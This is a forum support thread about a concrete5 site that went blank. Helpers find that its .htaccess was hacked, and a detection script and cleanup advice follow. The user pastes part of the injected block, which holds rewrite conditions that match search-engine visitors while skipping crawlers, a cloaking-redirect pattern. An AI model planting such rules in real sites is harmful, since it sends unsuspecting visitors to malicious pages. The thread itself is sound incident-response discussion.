Blank site, What have I done?

Hi all,
I was wondering if anyone could help me!
For some reason one of my sites has gone blank and I have no idea why.
http://www.hotspotgo.com
I have checked through the forums but can't find anything that is glaringly obvious.

Any relevant pointers will be greatly received.

Best wishes
Sean

SeanBrogan
 
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Are you able to review any error logs on your server?

This is most likely a PHP parsing error and the log file will tell you where the problem is. Alternatively you might be able to set PHP to output errors to the screen via php.ini or httpd.conf if you can get access to those.
SeanBrogan replied on at Permalink Reply
SeanBrogan
Yeah, I checked the error logs already, nothing there except logs for Feb on a separate WordPress installation.
Nothing else seems to be wrong, thanks for the pointer though.
SeanBrogan replied on at Permalink Reply
SeanBrogan
I am really struggling to fix this, really hoping someone else can come up with some ideas before I decide to re-install.
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Just to confirm it is a problem with C5, if you upload a test file (for example test.htm) with some static content in it, can you view it ok?
pvernaglia replied on at Permalink Reply
pvernaglia
Check config/site.php and make sure you don't have any blank lines in it.
SeanBrogan replied on at Permalink Reply
SeanBrogan
Yeh I can view:
www.www.hotspotgo.com/test.html...

I checked the site.php and removed 3 blank lines but that did not work either.

Open to any other suggestions.

Thanks for the replies so far guys!
DWD replied on at Permalink Reply
As the first reply said, it may be a PHP parsing error. Most likely error reporting is turned off, if your site is in "Production Mode", try to turn it on temporarily by adding the following to your .htaccess file in the root of your site via FTP.
php_flag display_errors on


If it works, when you load the site, you'll see the error and be able to track it down and fix it.

If you are able to fix it, just remember to go back to your .htaccess file and either comment out the line above or remove it completely.

HTH
Dave
SeanBrogan replied on at Permalink Reply
SeanBrogan
Ok, thanks DWD for that explanation, I now have an internal server error 500.
I will contact my host provider and see what they say.
DWD replied on at Permalink Reply
No problem, I saw that.

If your host doesn't offer any solutions, PM me and I'll see if I can help you further.

Additionally if you found this answer helpful please mark it as answered so others know a solution was found.

Thanks
Dave
SeanBrogan replied on at Permalink Reply
SeanBrogan
Hey DWD,
Yes on all counts, will do.
Thanks again!
SeanBrogan replied on at Permalink Reply
SeanBrogan
I got this response from the host support:

Dear Customer,

Sorry for the delay in my response.

You have this problem because you have the incorrect settings into ".htaccess" file.
Please check this file into your domains content.

So can anyone throw some light on this! I just don't understand how this has happened as it was working and I had not touched the htaccess file.

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Try removing everything ABOVE the line which says:

# -- concrete5 urls start --

If that gets it working again, you can narrow down from there where the problem lies in the .htaccess file.
ThemeGuru replied on at Permalink Reply
ThemeGuru
Make sure you bump up security on your server and only use SFTP.
SeanBrogan replied on at Permalink Reply
SeanBrogan
I tried that and it didn't work. Maybe I need to look at another site and see what the htaccess file says.

This is bugging me!
SeanBrogan replied on at Permalink Reply
SeanBrogan
Nope, on other sites that are working, the htaccess files are the same.
Anyone else got any other ideas?

In the meantime I am going back to my host support and explaining that the files are the same.
pvernaglia replied on at Permalink Reply
pvernaglia
How did you get blank lines in site.php? Were you doing something before the site went blank? The only time I have seen a site go blank is when there was something in site.php that didn't belong there.

Try copying the C5 installation files up to the site again.
SeanBrogan replied on at Permalink Reply
SeanBrogan
The blank lines I believe are written by the theme that I have installed, Luminosity.
I don't think this is the issue and I am still pursuing my host support because I believe this is a server issue. The reason for that belief is because no actual files were manually adjusted on the site other than the normal editing within the concrete editor etc.

I will let you know what my host support comes back with.

Best wishes
Sean
DWD replied on at Permalink Reply
Sean,

Sorry for my delayed response. From looking at your .htaccess a couple posts up, it seems your site was hacked and is now redirecting all traffic to http://two way serf.com (Spaces added on purpose). To answer your question a couple posts back, a vanilla Concrete5 .htaccess should be blank.

And after you turn on "prettyURLS" from dashboard it would look like this (if installed on your root):
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase / 
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
</IfModule>

You said you have cleared everything above
# -- concrete5 urls start --
as 1stWebDesigns recommended, to no avail. If so, other files may have been infected with malicious code.
The easiest way to see if other files were touched by malicious code is to look at the date modified via FTP. If you find them all to be the same (within a minute or two), I would locate the malicious code in one of the files and have your host locate and remove it; it will either be right at the beginning or at the end of the PHP file.
Or do as @pvernaglia said and copy the concrete5 files back to the server, but make sure to back up first just in case.

Also, I noticed you said your other concrete sites had the same .htaccess files. If so, you may have some work ahead of you.

HTH

Dave
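
The two checks described in the post above (spotting the injected search-referer block in .htaccess, and finding files that were all modified within a minute or two of each other) can be scripted. The following is an added example, not code from any poster in this thread or from concrete5; the function names, the 120-second window and the directory tree built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Heuristic taken from the injected block quoted in this thread: a RewriteCond
# that tests the Referer header against search-engine names.
REFERER_COND = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|yahoo|bing|yandex)",
    re.IGNORECASE | re.MULTILINE)

def suspicious_htaccess(root):
    """Return .htaccess files under root that contain such a condition."""
    return sorted(p for p in Path(root).rglob(".htaccess")
                  if REFERER_COND.search(p.read_text(errors="replace")))

def mtime_clusters(root, window=120, min_files=3, names=(".php", ".htaccess")):
    """Return runs of >= min_files files whose mtimes are <= window seconds apart."""
    files = sorted((p.stat().st_mtime, p) for p in Path(root).rglob("*")
                   if p.is_file() and (p.suffix in names or p.name in names))
    clusters, current = [], []
    for mtime, path in files:
        if current and mtime - current[-1][0] > window:
            if len(current) >= min_files:
                clusters.append([p for _, p in current])
            current = []
        current.append((mtime, path))
    if len(current) >= min_files:
        clusters.append([p for _, p in current])
    return clusters

def demo():
    """Build a constructed site tree (not real data) and run both checks."""
    root = Path(tempfile.mkdtemp())
    clean = ("RewriteEngine On\nRewriteCond %{REQUEST_FILENAME} !-f\n"
             "RewriteRule ^(.*)$ index.php/$1 [L]\n")
    bad = ("RewriteCond %{HTTP_REFERER} ^(http\\:\\/\\/)?(google\\.|yahoo\\.).*$ [NC]\n"
           + clean)
    layout = {"blog/.htaccess": (clean, 1_000_000), ".htaccess": (bad, 2_000_000),
              "index.php": ("<?php", 2_000_030), "config/site.php": ("<?php", 2_000_090),
              "themes/view.php": ("<?php", 1_500_000)}
    for rel, (text, mtime) in layout.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text)
        os.utime(target, (mtime, mtime))   # constructed modification time
    return root, suspicious_htaccess(root), mtime_clusters(root)

if __name__ == "__main__":
    print(demo()[1:])
```

A fresh install or a normal upload also produces a cluster of identical timestamps, so compare each cluster's time against deployments you know about before treating it as tampering.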
DWD replied on at Permalink Reply
So I did a little more research and found clicking on direct links to your site from Google is blocked by McAfee SiteAdvisor, with a malware warning.

So depending how much time you have on customizing your site you can either A. start from scratch or B. repair all infected files.

But before you do anything I would switch to SFTP as ThemeGuru suggested and change all your passwords, cPanel, mysql, FTP, etc.

Most likely it looks like an XSS hack.

Let me know if I may help further.

Dave